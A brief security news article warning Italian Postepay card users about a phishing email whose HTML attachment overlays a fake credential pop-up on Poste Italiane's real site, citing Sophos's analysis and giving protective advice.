14 DAY TRIAL // Security experts are advising users of Postepay cards, the pre-paid rechargeable cards of Poste Italiane, to be on the lookout for phishing emails designed to trick them into handing over the credentials for their Postepay accounts.
The emails, entitled “Ultima notifica da noi, attivare il nuovo sistema” (Last notification from us, activate the new system), appear to come from a legitimate Poste Italiane email address.
To make them less suspicious, they don’t contain any links. However, they do come with an .html file attached which, according to security firm Sophos, is fairly clever.
When executed, “Cliente.html” opens a legitimate Poste Italiane website. However, a pop-up message is displayed on top of it via an iFrame injection.
The pop-up window requests users to enter their usernames and passwords.
In this particular scheme, the cybercriminals use “hash busters” – represented by random strings of text – in an effort to bypass security solutions.
The cybercrooks appear to have a “thing” for Shakespeare, since the hash buster they’re utilizing is taken from Hamlet. More precisely, it’s the renowned “to be, or not to be” part.
However, the tactic isn’t very efficient against comprehensive security solutions. Sophos products detect the malicious html file as Troj/Ifrin-A.
Italian users are advised to avoid opening files attached to notifications. The messages might look legitimate but, in reality, companies usually don’t attach files to emails and they don’t request users to hand over personal or financial information.
If you’re a victim of this scam, make sure that you change your password immediately.
“Attacks like this are, once again, reminders for all of us to be careful about what email attachments we open on our computers - even if the email appears to come from an organisation that you regularly do business with,” Sophos’ Graham Cluley noted.